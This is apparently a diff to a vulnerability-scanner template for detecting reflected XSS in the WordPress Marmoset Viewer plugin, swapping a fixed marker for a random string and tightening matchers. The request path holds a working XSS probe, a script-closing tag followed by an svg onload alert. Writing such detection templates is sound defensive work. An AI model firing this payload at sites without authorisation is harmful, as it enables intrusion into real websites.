--- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml
+++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml
@@ -4,12 +4,14 @@ info:
   name: Wordpress Plugin Marmoset Viewer XSS
   author: johnjhacking
   severity: medium
-  tags: xss
+  tags: wordpress,xss
+  reference: https://wordpress.org/plugins/marmoset-viewer/#developers
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27hacked%27)>"
+      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>"
+
     matchers-condition: and
     matchers:
       - type: status
@@ -18,5 +20,7 @@ requests:
 
       - type: word
         words:
-          - "</script><svg/onload=alert('hacked')>"
+          - "</script><svg/onload=alert('{{randstr}}')>"
+          - "Marmoset Viewer"
         part: body
+        condition: and
